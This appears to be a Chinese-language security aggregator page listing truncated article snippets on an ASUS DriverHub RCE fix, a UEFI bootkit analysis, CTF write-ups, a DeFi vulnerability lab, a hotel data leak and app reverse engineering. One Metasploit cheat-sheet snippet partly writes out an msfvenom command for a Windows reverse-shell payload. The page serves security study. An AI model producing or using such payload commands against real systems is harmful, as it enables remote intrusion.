1. ASUS发布DriverHub安全更新修复RCE漏洞ASUS已经针对影响其DriverHub的两个安全漏洞发布了更新,这些漏洞可能导致远程代码执行(RCE)。DriverHub是一个自动检测计算...
白帽黑客必读博客精选之 HaE及CaA 作者 key 神的个人博客推荐
一、写在前面:一次被插件点燃的学习之路我第一次了解到 key 神是在 2022 年,那时我刚刚入门,开始尝试进行 SRC 漏洞挖掘。也是在那个时候,我接触到了他开发的著名插件 —— HaE。凭借这个插...
首个可绕过Win11安全启动保护UEFI恶意软件分析一
近年来发现的UEFI 漏洞数量以及未能在合理的时间窗口内修补或撤销易受攻击的二进制文件并没有被威胁者忽视。因此,第一个绕过基本平台安全功能(UEFI 安全启动)的公开 UEFI bootkit 现已成...
DEFCON 33 CTF 解题系列 #3:dialects (pwn)
【翻译】DEFCON 33 CTF Write-Up Series 3 dialects (pwn)dialects逆向分析第一步静态链接、符号表被剥离的二进制文件 🤮> file ctf ...
MSF命令大全详解
1|00x00 Payload生成1|1Windows·LinuxWindows: msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的IP] l...
【PHP代审】新版H5大圣棋牌游戏源码
点击上方蓝字·关注我们免责声明由于传播、利用本公众号菜狗安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号菜狗安全及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵...
DeFiVulnLabs靶场全系列详解(四十二)转账函数固定2300个gas导致合约可用性遭到破坏
01—前言此内容仅作为展示Solidity常见错误的概念证明。它严格用于教育目的,不应被解释为鼓励或认可任何形式的非法活动或实际的黑客攻击企图。所提供的信息仅供参考和学习,基于此内容采取的任何行动均由...
CVE-2025-4076 BL-Link远程代码执行漏洞挖掘
招新小广告CTF组诚招re、crypto、pwn、misc、合约方向的师傅,长期招新IOT+Car+工控+样本分析多个组招人有意向的师傅请联系邮箱 [email protected](带上简历和想加入的...
【工具推荐】自动小程序反编译并匹配敏感信息
免责声明 本文旨在提供有关特定漏洞工具或安全风险的详细信息,以帮助安全研究人员、系统管理员和开发人员更好地理解和修复潜在的安全威胁,协助提高网络安全意识并推动技术进步,而非出于任何恶意目的。利用本文提...
map文件解析
来源:大国物联网我们在使用Keil MDK编译ARM处理器的应用程序时,程序编译完成后会在下方的Build Output窗口中出现下图的信息提示,其中红色框框的内容对我们尤为重要;Code、RO-da...
中国澳门十六浦索菲特酒店数据泄露
中国澳门十六浦索菲特酒店数据泄露公司介绍澳门十六浦索菲特酒店(Sofitel Macau at Ponte 16)是一家位于中国澳门的五星级酒店,坐落在海滨地带,提供豪华住宿、餐饮选择和娱乐设施。酒店...
还搞定不了APP so层算法使用动态密钥加密传输?手把手教会你!
1 Start 越来越多的单位喜欢用对称加密和非对称加密相结合的方式来加固自己的通信数据,也就是动态生成对称加密的密钥,然后使用对称加密来加密通信数据包,使用非对称加密去加密动态...
24857